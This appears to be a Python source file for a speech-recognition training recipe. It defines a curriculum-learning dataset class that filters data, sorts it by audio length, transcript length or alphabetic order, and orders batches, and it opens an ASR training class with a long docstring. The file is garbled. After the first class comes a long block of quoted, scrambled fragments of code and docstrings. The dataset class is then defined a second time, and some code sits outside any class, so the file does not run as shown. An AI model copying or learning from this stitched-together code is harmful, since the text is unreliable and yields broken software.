                        args=[Stage.VALID, avg_valid_loss, epoch],
                    )

            # Debug mode only runs a few epochs
            if self.debug and epoch == self.debug_epochs:
                break
class CurriculumOrientedDynamicDataset(DynamicItemDataset):
    def curriculum_based_filtered_sorted(
        self,
        key_min_value={},
        key_max_value={},
        key_test={},
        min_weight=None,
        max_weight=None,
        weights=None,
        ordering_info="",
        batch_selection="contiguous",
        batch_size=8,
        select_n=None,
    ):
        """Get a filtered and/or sorted version of this dataset.

        Shares static data, but has its own output keys and dynamic items
        (initially deep copied from this, so they have the same dynamic items
        available). The reason to implement these operations in the same
        method is that the filtering and sorting steps don't need to compute
        the dynamic items twice.

        Arguments
        ---------
        key_min_value : dict
            Map from key (in data or in dynamic items) to limit, will only
            keep data_point if data_point[key] >= limit
        key_max_value : dict
            Map from key (in data or in dynamic items) to limit, will only
            keep data_point if data_point[key] <= limit
        key_test : dict
            Map from key (in data or in dynamic items) to func, will only
            keep data_point if bool(func(data_point[key])) == True
        min_weight : None, float
            If not None, will only keep data_point if
            weight[data_point] >= min_weight
        max_weight : None, float
            If not None, will only keep data_point if
            weight[data_point] < max_weight
        weights : None, dict
            Map from data_id to weight, these weight(s) will be used to sort
            the dataset
        ordering_info : str
            Information to create weights based on pre-defined keys (and/or
            methods), as illustrated by the sketch further below.
            - Possible keys: `input_length`, `output_length`, `alphabetic`
            - Options for order: `asc`, `desc`
            - Example:
                * "input_length:asc,output_length:desc" - Sort the dataset
                  using ``input_length`` in ascending order, tie is broken
                  using ``output_length`` in descending order
            Note: This is used only if `weights` is None
        batch_selection : str
            Information on how to order batches.
            - Possible Values are `contiguous`, `random`, `sorted`,
              `reverse-sorted`
            - Example:
                * "random" - After dataset is ordered based on
                  `ordering_info`, divide the dataset into batches of size
                  `batch_size` and order these batches randomly to create the
                  final dataset
        batch_size : 8, int
            Used to divide the dataset into batches. This helps in ordering
            the dataset at batch level.
        select_n : None, int
            If not None, only keep (at most) the first n filtered
            data_points. The possible sorting is applied, and the returned
            dataset is deep copied from this, so they have the same dynamic
            items available.
        """
        # ordering type can be random, sorted
        # keys for ordering info can be input_length, output_length,
        # alphabetic
        dataset_ordering = self._parse_dataset_order(ordering_info)
        ordering_type = "sorted" if len(dataset_ordering) > 0 else "random"

        filtered_data_ids = self._filter_dataset(
            self.data_ids, key_min_value, key_max_value, key_test
        )

        # order entire dataset
        if ordering_type == "random":
            weights = self._random_shuffled_weights(filtered_data_ids)
        elif ordering_type == "sorted":
            if weights == None:
                # Create dataset using ordering info
                weights = self._custom_sorted_weights(
                    filtered_data_ids, dataset_ordering
                )
            else:
                pass
        else:
            raise NotImplementedError(
                "Ordering Type must be one of random, sorted, weighted_sorted."
            )

        # order batchwise
        if batch_selection == "contiguous":
            pass
        elif batch_selection == "random":
            weights = self._random_shuffled_batches(weights, batch_size)
        elif batch_selection == "sorted":
            pass
        elif batch_selection == "reverse-sorted":
            weights = self._reverse_sort_batches(weights, batch_size)
        else:
            raise NotImplementedError(
                "Ordering Type must be one of random, sorted, weighted_sorted."
            )

        # create Dataloader using the weights
        filtered_sorted_ids = self._weighted_filtered_sorted_ids(
            weights, min_weight, max_weight, select_n
        )
        return FilteredSortedDynamicItemDataset(self, filtered_sorted_ids)

    def _filter_dataset(
        self, data_ids, key_min_value={}, key_max_value={}, key_test={}
    ):
        """Filters out data points that do not match the filtering
        criteria."""

        def combined_filter(computed, key_min_value, key_max_value, key_test):
            """Checks if the data example fulfills the filtering criteria"""
            for key, limit in key_min_value.items():
                if computed[key] >= limit:
                    continue
                return False
            for key, limit in key_max_value.items():
                if computed[key] <= limit:
                    continue
                return False
            for key, func in key_test.items():
                if bool(func(computed[key])):
                    continue
                return False
            return True

        temp_keys = (
            set(key_min_value.keys())
            | set(key_max_value.keys())
            | set(key_test.keys())
        )

        filtered_data_ids = []
        with self.output_keys_as(temp_keys):
            for i, data_id in enumerate(data_ids):
                data_point = self.data[data_id]
                data_point["id"] = data_id
                computed = self.pipeline.compute_outputs(data_point)
                if combined_filter(
                    computed, key_min_value, key_max_value, key_test
                ):
                    filtered_data_ids.append(data_id)
        return filtered_data_ids
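    # Tiny illustration of the combined_filter semantics in _filter_dataset
    # above: a data point survives only if it passes every min/max/test rule.
    # The keys and limits below are made up.
    @staticmethod
    def _filter_rule_sketch():
        computed = {"duration": 3.2, "wrd": "hello world"}
        return (
            computed["duration"] >= 1.0         # a key_min_value rule
            and computed["duration"] <= 30.0    # a key_max_value rule
            and bool(len(computed["wrd"]) > 0)  # a key_test rule
        )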
The", "targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) = predictions ids = batch.id tokens_eos, tokens_eos_lens =", "torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens,", "combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data example fulfills the filtering criteria\"\"\"", "data points as equal, continue # comparing using the next key, else return", "a certain behavior: * ``fit_batch()`` * ``evaluate_batch()`` * ``update_average()`` If the initialization was", "): self.step += 1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss", "on a Transformer decoder. Beamsearch coupled with a Transformer language model is used", "0: # for the sake of efficiency, we only perform beamsearch with limited", "test_clean, test_other etc asr_brain.hparams.wer_file = os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k],", "pretrained LM from HuggingFace (or elsewhere depending on # # the path given", "\"\"\"Gets called at the end of a epoch. This is used to handle", "in input\"\"\" # check if we need to switch optimizer # if so", "is not None and not ( isinstance(valid_set, DataLoader) or isinstance(valid_set, LoopedLoader) ): valid_set", ": None, dict Map from data_id to weight, these weight(s) will be used", "in sorted(filtered_ids, reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in", "batch_selection=batch_selection, batch_size=batch_size ) # when sorting do not shuffle in dataloader ! otherwise", "this, so they have the same dynamic items available) \"\"\" # ordering type", "if current_epoch % valid_search_interval == 0 or ( stage == sb.Stage.TEST ): #", "self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard summary writer self.tensorboard_writer", "reshuffled at the end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1:", "0.0 self.step = 0 # Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID,", "This behavior can be changed by overriding the ``configure_optimizers()`` method. hparams : dict", "self.checkpointer is not None and self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time >=", "def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids)", "_, _ = self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets", "string key and a hyperparameter that is used within the overridden methods. These", "distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The location for", "done. For more complicated use cases, such as multiple modules that need to", ", loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train the parameters given a single batch", "torch.optim class A torch optimizer constructor that has takes only the list of", "stop if loss is not fini self.check_gradients(loss) self.optimizer.step() self.optimizer.zero_grad() # anneal lr every", "Load latest checkpoint to resume training if interrupted if self.checkpointer is not None:", "training. If a Dataset is given, a DataLoader is automatically created. 
If a", "# forward modules src = self.modules.CNN(feats) enc_out, pred = self.modules.Transformer( src, tokens_bos, wav_lens,", ": dict Kwargs passed to `make_dataloader()` for making the valid_loader (if valid_set is", "pipeline through user-defined functions.\"\"\" data_folder = hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"],", "* 0 - key1 = key2 \"\"\" for ordering in dataset_orderings: key =", "= self.data[data_id] data_point[\"id\"] = data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test):", "in enumerate(sorted_data_ids): weights[id] = index return weights def _input_length_comparator( self, key1, key2 ):", "\"Ordering Type must be one of random, sorted, weighted_sorted.\" ) # create Dataloader", "at the beginning of the ``fit()`` method. This behavior can be changed by", "Default ``2``. debug_epochs (int) Number of epochs to run in debug mode, Default", "ordering_info : str Information to create weights based on pre-defined keys( and/or methods)", "such as multiple modules that need to be updated, the following methods can", "self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the datasets to be used in the", "speechbrain.core import Stage import time def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): #", "only methods that need to be overridden are: * ``compute_forward()`` * ``compute_objectives()`` The", "that can (or should) be overridden. The following methods are used and expected", "Librispeech) from librispeech_prepare import prepare_librispeech # noqa # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"],", "None, int If not None, only keep (at most) the first n filtered", "random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, )", "sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens, hyps def compute_objectives(self,", "hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data)", "Number of epochs to run in debug mode, Default ``2``. If a non-positive", "= self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at", "of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of epochs", "Path import speechbrain as sb from hyperpyyaml import load_hyperpyyaml from speechbrain.utils.distributed import run_on_main", "Compute/store important stats stage_stats = {\"loss\": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats =", "variations. Authors * <NAME> 2020 * <NAME> 2020 * <NAME> 2020 * <NAME>", "joint) beamsearch coupled with a neural language model. 
    def _input_length_comparator(self, key1, key2):
        """Compare two data points based on input length"""
        duration1 = float(self.data[key1]["duration"])
        duration2 = float(self.data[key2]["duration"])
        if duration1 > duration2:
            return 1
        elif duration1 < duration2:
            return -1
        else:
            return 0

    def _output_length_comparator(self, key1, key2):
        """Compare two data points based on output length"""
        length1 = len(self.data[key1]["wrd"])
        length2 = len(self.data[key2]["wrd"])
        if length1 > length2:
            return 1
        elif length1 < length2:
            return -1
        else:
            return 0

    def _alphabetic_comparator(self, key1, key2):
        """Compare two data points based on alphabetic order"""
        text1 = self.data[key1]["wrd"]
        text2 = self.data[key2]["wrd"]
        if text1 > text2:
            return 1
        elif text1 < text2:
            return -1
        else:
            return 0

    def _random_shuffled_batches(
        self, weights=None, batch_size=8, reverse=False
    ):
        """Randomly shuffle the dataset at batch level"""
        # place every data_id at the position given by its weight
        data_ids = [None] * len(weights)
        for data_id in weights:
            data_ids[weights[data_id]] = data_id

        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        # visit the batches in random order
        for batch in np.random.permutation(batch_count):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(data_ids)

        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights

    def _reverse_sort_batches(self, weights=None, batch_size=8):
        """Reverse sort the dataset at batch level"""
        # place every data_id at the position given by its weight
        data_ids = [None] * len(weights)
        for data_id in weights:
            data_ids[weights[data_id]] = data_id

        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        # visit the batches in reverse order
        for batch in np.flipud(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(data_ids)

        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights
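# Batch-level selection, illustrated on a toy ordered id list (sketch only;
# the dataset methods above operate on weight dicts instead of plain lists):
def _batch_selection_sketch(ids=tuple("abcdefgh"), batch_size=3):
    batches = [
        list(ids[i:i + batch_size]) for i in range(0, len(ids), batch_size)
    ]
    return {
        "contiguous": [i for b in batches for i in b],
        "reverse-sorted": [i for b in reversed(batches) for i in b],
        "random": [
            i for b in np.random.permutation(len(batches)) for i in batches[b]
        ],
    }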
\"\"\"", "This is used to handle , whether the dataset needs to be reshuffled", "self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run validation \"on_stage_end\" on main", "using preferred cl approach return else: if self.sortagrad != -1: # number of", "# \"sorting must be random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(", "is separate test_datasets = {} for csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name]", "key_test : dict Map from key (in data or in dynamic items) to", "= self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for index,id in enumerate(sorted_data_ids): weights[id]", "systems. By properly changing the parameter files, you can try different encoders, decoders,", "key_min_value={}, key_max_value={}, key_test={}, min_weight=None, max_weight=None, weights=None, ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a", "resumed from stage two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current current_optimizer = self.optimizer", "self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at", "If not None, will only keep data_point if weight[data_point] < max_weight weights :", "data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets = [train_data, valid_data] + [i", "hparams[\"sorting\"] == \"random\": # pass # else: # raise NotImplementedError( # \"sorting must", "min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key )", "= self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise], dim=0) wav_lens = torch.cat([wav_lens, wav_lens]) tokens_bos", "Only run validation \"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID,", "False sortagrad: int Number of epochs, for which curriculum based dataset be used.", "== sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w:", "data_point if data_point[key] <= limit key_test : dict Map from key (in data", "tokens_lens) loss = ( self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq", "if current_epoch % self.hparams.valid_search_interval == 0: # for the sake of efficiency, we", "if we need to switch optimizer # if so change the optimizer from", "the pretrained LM from HuggingFace (or elsewhere depending on # # the path", "self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats, ) with open(self.hparams.wer_file, \"w\") as w: self.wer_metric.write_stats(w) #", "= self.compute_objectives(predictions, batch, stage=stage) return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at", "if isinstance(self.optimizer, torch.optim.SGD): self.switched = True if self.switched is True: return if current_epoch", "run_opts, overrides = sb.parse_arguments(sys.argv[1:]) with open(hparams_file) as fin: hparams = 
def make_dataloader(
    dataset, stage, ckpt_prefix="dataloader-", **loader_kwargs,
):
    # TRAIN stage is handled specially.
    dataloader = sb.dataio.dataloader.make_dataloader(
        dataset, **loader_kwargs
    )
    return dataloader
class CurriculumOrientedDynamicDataset(DynamicItemDataset):
    def curriculum_based_filtered_sorted(
        self,
        key_min_value={},
        key_max_value={},
        key_test={},
        min_weight=None,
        max_weight=None,
        weights=None,
        ordering_info="",
        batch_selection="contiguous",
        batch_size=8,
        select_n=None,
    ):
        """Get a filtered and/or sorted version of this based on the
        specified curriculum, sharing static data.

        The reason to implement these operations in the same method is
        that computing some dynamic items may be expensive, and this way
        the filtering and sorting steps don't need to compute the dynamic
        items twice.

        Arguments
        ---------
        key_min_value : dict
            Map from key (in data or in dynamic items) to limit, will
            only keep data_point if data_point[key] >= limit.
        key_max_value : dict
            Map from key (in data or in dynamic items) to limit, will
            only keep data_point if data_point[key] <= limit.
        key_test : dict
            Map from key (in data or in dynamic items) to func, will
            only keep data_point if bool(func(data_point[key])) == True.
        min_weight : None, int
            If not None, will only keep data_point if
            weights[data_point] >= min_weight.
        max_weight : None, int
            If not None, will only keep data_point if
            weights[data_point] < max_weight.
        weights : None, dict
            Map from data_id to weight; these weight(s) will be used to
            sort the dataset.
        ordering_info : str
            Information to create weights based on pre-defined keys
            (and/or methods). This is used only if `weights` is None.
            - Format: "<key1>:<order1>,<key2>:<order2>,........"
            - Options for keys: `input_length`, `output_length`, `alphabetic`
            - Example:
                * "input_length:asc,output_length:desc" - Sort the dataset
                  using ``input_length`` in ascending order; a tie is
                  broken using ``output_length`` in descending order.
        batch_selection : str
            Information on how to order batches.
            - Possible values are `contiguous`, `random`, `sorted`,
              `reverse-sorted`.
            - Example:
                * "random" - After the dataset is ordered based on
                  `ordering_info`, divide the dataset into batches of size
                  `batch_size` and order these batches randomly to create
                  the final dataset.
        batch_size : 8, int
            Used to divide the dataset into batches. This helps in
            ordering the dataset at batch level.
        select_n : None, int
            If not None, only keep (at most) the first n filtered
            data_points. The possible sorting is applied, but only on the
            first n data points found. Meant for debugging.

        Returns
        -------
        FilteredSortedDynamicItemDataset
            Shares the static data, but has its own output keys and
            dynamic items (initially deep copied from this, so they have
            the same dynamic items available).
        """
        dataset_ordering = self._parse_dataset_order(ordering_info)
        ordering_type = "sorted" if len(dataset_ordering) > 0 else "random"
        filtered_data_ids = self._filter_dataset(
            self.data_ids, key_min_value, key_max_value, key_test
        )

        # ordering type can be random, sorted
        if ordering_type == "random":
            weights = self._random_shuffled_weights(filtered_data_ids)
        elif ordering_type == "sorted":
            if weights is None:
                weights = self._custom_sorted_weights(
                    filtered_data_ids, dataset_ordering
                )

        # order the dataset at batch level
        if batch_selection == "contiguous":
            pass
        elif batch_selection == "random":
            weights = self._random_shuffled_batches(weights, batch_size)
        elif batch_selection == "sorted":
            pass
        elif batch_selection == "reverse-sorted":
            weights = self._reverse_sort_batches(weights, batch_size)
        else:
            raise NotImplementedError(
                "Ordering Type must be one of random, sorted, weighted_sorted."
            )

        # create Dataloader using the weights
        filtered_sorted_ids = self._weighted_filtered_sorted_ids(
            weights, min_weight, max_weight, select_n
        )
        return FilteredSortedDynamicItemDataset(self, filtered_sorted_ids)
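    # Illustrative usage sketch (not part of the recipe): assuming a manifest
    # CSV with "duration" and "wrd" columns, a curriculum-ordered view could
    # be built like this; the csv path and replacements below are hypothetical.
    #
    #   train_data = CurriculumOrientedDynamicDataset.from_csv(
    #       csv_path="train.csv", replacements={"data_root": "/data"},
    #   )
    #   train_data = train_data.curriculum_based_filtered_sorted(
    #       ordering_info="input_length:asc,output_length:desc",
    #       batch_selection="random",
    #       batch_size=8,
    #   )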
    def _filter_dataset(
        self, data_ids, key_min_value={}, key_max_value={}, key_test={}
    ):
        """Returns a list of data ids, fulfilling the filtering criteria."""

        def combined_filter(computed, key_min_value, key_max_value, key_test):
            """Checks if the data example fulfills the filtering criteria"""
            for key, limit in key_min_value.items():
                if computed[key] >= limit:
                    continue
                return False
            for key, limit in key_max_value.items():
                if computed[key] <= limit:
                    continue
                return False
            for key, func in key_test.items():
                if bool(func(computed[key])):
                    continue
                return False
            return True

        temp_keys = (
            set(key_min_value.keys())
            | set(key_max_value.keys())
            | set(key_test.keys())
        )
        filtered_data_ids = []
        with self.output_keys_as(temp_keys):
            for i, data_id in enumerate(data_ids):
                data_point = self.data[data_id]
                data_point["id"] = data_id
                computed = self.pipeline.compute_outputs(data_point)
                if combined_filter(
                    computed, key_min_value, key_max_value, key_test
                ):
                    filtered_data_ids.append(data_id)
        return filtered_data_ids
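    # A hedged filtering example: the 10-second cutoff below is made up, but
    # it shows how key_max_value and key_test compose in one call.
    #
    #   short_ids = dataset._filter_dataset(
    #       dataset.data_ids,
    #       key_max_value={"duration": 10.0},
    #       key_test={"wrd": lambda text: len(text) > 0},
    #   )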
    def _weighted_filtered_sorted_ids(
        self, weights, min_value=None, max_value=None, select_n=None, reverse=False
    ):
        """Returns a list of data ids, filtered and sorted using custom weights"""

        def weights_filter(weights, min_value, max_value):
            """Checks if data point has weight within the range
            (`min_value`, `max_value`)"""
            if min_value is None and max_value is None:
                return weights
            if isinstance(min_value, int):
                min_value = float(min_value)
            if isinstance(max_value, int):
                max_value = float(max_value)
            # iterate over a copy: popping from a dict while iterating it
            # raises a RuntimeError
            for key, value in list(weights.items()):
                if (isinstance(min_value, float) and value < min_value) or (
                    isinstance(max_value, float) and value > max_value
                ):
                    weights.pop(key, None)
            return weights

        filtered_weights = weights_filter(weights, min_value, max_value)
        filtered_ids = []
        for i, data_id in enumerate(filtered_weights.keys()):
            if select_n is not None and len(filtered_ids) == select_n:
                break
            filtered_ids.append((filtered_weights[data_id], i, data_id))
        filtered_sorted_ids = [
            tup[2] for tup in sorted(filtered_ids, reverse=reverse)
        ]
        return filtered_sorted_ids

    def _parse_dataset_order(self, dataset_order=""):
        """Takes `ordering_info` as a string and turns it into a list of
        {"key": ..., "order": ...} dictionaries."""
        ordering_info = []
        orderings = dataset_order.split(",")
        for order in orderings:
            if order.strip() == "":
                continue
            column, order = order.split(":")
            ordering_info.append({"key": column, "order": order})
        return ordering_info
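    # For instance, the example string from the docstring above parses as:
    #
    #   self._parse_dataset_order("input_length:asc,output_length:desc")
    #   # -> [{"key": "input_length", "order": "asc"},
    #   #     {"key": "output_length", "order": "desc"}]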
    def _random_shuffle_data_ids(self, data_ids):
        """Shuffle the data_ids in random order"""
        return np.random.permutation(data_ids)

    def _random_shuffled_weights(self, data_ids):
        """Create random weights by assigning each data id its position in
        a random permutation"""
        shuffled_ids = self._random_shuffle_data_ids(data_ids)
        weights = {}
        for index, id in enumerate(shuffled_ids):
            weights[id] = index
        return weights

    def _random_shuffled_batches(self, weights, batch_size):
        """Create `weights` that randomly order the dataset at batch level"""
        # lay the data ids out in weight order
        data_ids = list(weights.keys())
        for data_id in weights:
            data_ids[weights[data_id]] = data_id
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.random.permutation(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise shuffling gone wrong."
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights

    def _reverse_sort_batches(self, weights, batch_size):
        """Create `weights` that keep each batch intact but emit the
        batches in reverse order"""
        data_ids = list(weights.keys())
        for data_id in weights:
            data_ids[weights[data_id]] = data_id
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.flipud(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise shuffling gone wrong."
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights
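    # A small worked example of the batch-level reordering (illustrative
    # numbers only): with ids ordered [a, b, c, d, e] and batch_size=2 the
    # batches are [a, b], [c, d], [e]; `random` emits the batches in a
    # random order, e.g.
    #
    #   [c, d] + [e] + [a, b]  ->  weights {c: 0, d: 1, e: 2, a: 3, b: 4}
    #
    # while `reverse-sorted` deterministically yields [e] + [c, d] + [a, b].
    # Members of a batch always stay together in both cases.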
    def _custom_sorted_weights(self, data_ids, dataset_orderings):
        """Create `weights` for data points using the user-specified
        orderings."""

        def compare(key1, key2):
            """Comparing logic, as `ordering_info` can contain multiple keys.

            Note: Value and its meaning
                * 1 - key1 > key2
                * -1 - key1 < key2
                * 0 - key1 = key2
            """
            res = 0
            for ordering in dataset_orderings:
                key = ordering["key"]
                # map the order flag onto a sign for the comparator result
                # (the "asc"/"desc" spelling is assumed from the docstring)
                order = 1 if ordering["order"] == "asc" else -1
                if key == "input_length":
                    res = self._input_length_comparator(key1, key2)
                elif key == "output_length":
                    res = self._output_length_comparator(key1, key2)
                elif key == "alphabetic":
                    res = self._alphabetic_comparator(key1, key2)
                res *= order
                # If comparison using `key` returned data points as equal,
                # continue comparing using the next key, else return the result
                if res == 0:
                    continue
                else:
                    return res
            return res

        shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
        sorted_data_ids = sorted(shuffled_data_ids, key=cmp_to_key(compare))
        weights = {}
        for index, id in enumerate(sorted_data_ids):
            weights[id] = index
        return weights

    def _input_length_comparator(self, key1, key2):
        """Compare two data points based on input length"""
        duration1 = float(self.data[key1]["duration"])
        duration2 = float(self.data[key2]["duration"])
        if duration1 > duration2:
            return 1
        elif duration1 < duration2:
            return -1
        else:
            return 0

    def _output_length_comparator(self, key1, key2):
        """Compare two data points based on output length"""
        length1 = len(self.data[key1]["wrd"])
        length2 = len(self.data[key2]["wrd"])
        if length1 > length2:
            return 1
        elif length1 < length2:
            return -1
        else:
            return 0

    def _alphabetic_comparator(self, key1, key2):
        """Compare two data points based on alphabetic order"""
        text1 = self.data[key1]["wrd"]
        text2 = self.data[key2]["wrd"]
        if text1 > text2:
            return 1
        elif text1 < text2:
            return -1
        else:
            return 0
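# The multi-key comparison above follows the usual cmp_to_key pattern. A
# self-contained toy version (illustrative data, not from the recipe):
#
#   from functools import cmp_to_key
#
#   rows = {"a": (3.0, "x"), "b": (1.0, "z"), "c": (1.0, "y")}
#
#   def cmp(k1, k2):
#       # primary key ascending, secondary key descending
#       for idx, sign in ((0, 1), (1, -1)):
#           res = (rows[k1][idx] > rows[k2][idx]) - (rows[k1][idx] < rows[k2][idx])
#           res *= sign
#           if res != 0:
#               return res
#       return 0
#
#   sorted(rows, key=cmp_to_key(cmp))  # -> ['b', 'c', 'a']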
class ASR(sb.core.Brain):
    r"""Brain class abstracts away the details of data loops.

    The primary purpose of the `Brain` class is the implementation of the
    ``fit()`` method, which iterates epochs and datasets for the purpose
    of "fitting" a set of modules to a set of data.

    In order to use the ``fit()`` method, one should sub-class the
    ``Brain`` class and override any methods for which the default
    behavior does not match the use case. For simple use cases (e.g.,
    training a single model with a single dataset) the only methods that
    need to be overridden are:

    * ``compute_forward()``
    * ``compute_objectives()``

    The example below illustrates how overriding these two methods is
    done. For more complicated use cases, such as multiple modules that
    need to be updated, the following methods can be useful to override:

    * ``fit_batch()``
    * ``evaluate_batch()``
    * ``update_average()``

    If the initialization was done with distributed_count > 0 and the
    distributed_backend is ddp, this will generally handle multiprocess
    logic, like splitting the training data into subsets for each device
    and only saving a checkpoint on the main process.

    Arguments
    ---------
    modules : dict of str:torch.nn.Module pairs
        These modules are passed to the optimizer by default if they have
        trainable parameters, and will have ``train()``/``eval()`` called
        on them.
    opt_class : torch.optim class
        A torch optimizer constructor that takes only the list of
        parameters (e.g. a lambda or partial function definition). By
        default, this will be passed all modules in ``modules`` at the
        beginning of the ``fit()`` method. This behavior can be changed
        by overriding the ``configure_optimizers()`` method.
    hparams : dict
        Each key:value pair should consist of a string key and a
        hyperparameter that is used within the overridden methods. These
        will be accessible via an ``hparams`` attribute, using "dot"
        notation: e.g., self.hparams.model(x).
    run_opts : dict
        A set of options to change the runtime environment, including

        debug (bool)
            If ``True``, this will only iterate a few batches for all
            datasets, to ensure code runs without crashing.
        debug_batches (int)
            Number of batches to run in debug mode, Default ``2``.
        debug_epochs (int)
            Number of epochs to run in debug mode, Default ``2``.
            If a non-positive number is passed, all epochs are run.
        jit_module_keys (list of str)
            List of keys in ``modules`` that should be jit compiled.
        distributed_count (int)
            Number of devices to run on.
        distributed_backend (str)
            One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``.
        device (str)
            The location for performing computations.
        auto_mix_prec (bool)
            If ``True``, automatic mixed-precision is used. Activate it
            only with cuda.
        max_grad_norm (float)
            Default implementation of ``fit_batch()`` uses
            ``clip_grad_norm_`` with this value. Default: ``5``.
        nonfinite_patience (int)
            Number of times to ignore non-finite losses before stopping.
            Default: ``3``.
        noprogressbar (bool)
            Whether to turn off progressbar when training. Default: ``False``.
        ckpt_interval_minutes (float)
            Amount of time between saving intra-epoch checkpoints, in
            minutes, default: ``15.0``. If non-positive, these are not
            saved.
    checkpointer : speechbrain.Checkpointer
        By default, this will be used to load checkpoints, and will have
        the optimizer added to continue training if interrupted.
    inter_epoch_dataset_updation : bool
        Whether the dataset must be updated between epochs or not. It is
        used in curriculum learning (CL) approaches that take feedback
        from the model and reshuffle the dataset. By default, it is
        ``False``.
    sortagrad : int
        Number of epochs for which the curriculum-ordered dataset is
        used. It can take one of two kinds of values:

        * ``-1`` - Use curriculum learning for all epochs
        * ``n`` - Use curriculum learning for ``n`` number of epochs

        By default, it is ``-1``.
    """

    def __init__(
        self,
        modules=None,
        opt_class=None,
        hparams=None,
        run_opts=None,
        checkpointer=None,
        inter_epoch_dataset_updation=False,
        sortagrad=-1,
    ):
        super().__init__(
            modules=modules,
            opt_class=opt_class,
            hparams=hparams,
            run_opts=run_opts,
            checkpointer=checkpointer,
        )
